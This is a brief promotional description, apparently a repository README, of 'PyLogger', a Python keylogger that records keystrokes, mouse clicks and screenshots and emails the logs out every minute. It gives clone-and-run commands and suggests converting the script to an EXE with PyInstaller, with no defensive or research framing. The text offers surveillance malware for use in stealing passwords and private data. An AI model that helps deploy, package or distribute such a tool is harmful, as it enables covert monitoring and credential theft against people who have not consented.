PyLogger is simple and powerful Python keylogger that is able to log keystrokes, log mouse clicks, take screenshots and more! The tool will send the logs to your email every minute(you can change this).
-
Clone it:
git clone https://github.com/Debajyoti0-0/Pylogger.git
-
Run it:
python3 PyLogger.py
You can also convert PyLogger to EXE using PyInstaller or any similar tool.